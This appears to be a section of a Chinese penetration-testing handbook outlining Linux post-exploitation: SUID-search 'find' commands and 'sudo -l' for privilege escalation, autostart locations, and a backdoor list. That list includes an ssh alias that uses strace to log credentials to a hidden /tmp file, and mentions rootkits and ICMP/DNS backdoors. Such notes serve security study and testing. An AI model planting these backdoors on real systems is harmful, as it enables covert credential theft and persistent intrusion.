6.5. 持久化 - Linux

6.5. 持久化 - Linux

6.5.1. 权限提升

• 内核漏洞利用
• 攻击有root权限的服务
• 利用第三方服务提权
• 通过有SUID属性的可执行文件
  • 查找可能提权的可执行文件
  • find / -perm +4000 -ls
  • find / -perm -u=s -type f 2>/dev/null
  • find / -user root -perm -4000 -print 2>/dev/null
  • find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
• 利用可用的root权限
  • sudo -l
• 利用误配置的 crontab 任务

6.5.2. 自启动

• /etc/init.d
• /etc/rc.d/rc.local

6.5.3. 后门

• ssh 后门
  • alias ssh='strace -o /tmp/.ssh.log -e read,write,connect -s 2048 ssh'
  • 后门账户
• 常见应用
  • ICMP
  • DNS
• icmp后门
• 后门端口复用
• .开头隐藏文件
• rootkit